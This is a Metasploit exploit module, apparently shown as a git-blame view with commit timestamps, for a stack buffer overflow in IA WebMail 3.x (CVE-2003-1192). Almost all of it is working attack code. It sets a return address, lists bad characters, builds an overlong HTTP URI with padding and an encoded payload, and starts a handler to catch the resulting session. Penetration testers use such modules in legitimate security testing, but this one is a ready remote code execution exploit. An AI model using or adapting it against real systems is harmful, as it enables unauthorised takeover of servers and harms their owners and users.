metasploit-framework/modules/exploits/windows/http/ia_webmail.rb

63 lines
1.6 KiB
Ruby
Raw Normal View History

##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = AverageRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'IA WebMail 3.x Buffer Overflow',
'Description' => %q{
This exploits a stack buffer overflow in the IA WebMail server.
This exploit has not been tested against a live system at
this time.
},
'Author' => [ 'hdm' ],
'References' =>
[
[ 'CVE', '2003-1192'],
[ 'OSVDB', '2757'],
2013-08-30 21:28:54 +00:00
[ 'BID', '8965'],
[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
},
'Platform' => 'win',
'Targets' =>
[
[
'IA WebMail 3.x',
{
'Ret' => 0x1002bd33,
'Length' => 1036
},
]
],
'DisclosureDate' => 'Nov 3 2003',
'DefaultTarget' => 0))
end
2013-08-30 21:28:54 +00:00
def exploit
print_status("Sending request...")
2013-08-30 21:28:54 +00:00
send_request_raw({
'uri' =>
"/" + ("o" * target['Length']) +
"META" +
[target.ret].pack('V') +
payload.encoded
}, 2)
2013-08-30 21:28:54 +00:00
handler
end
end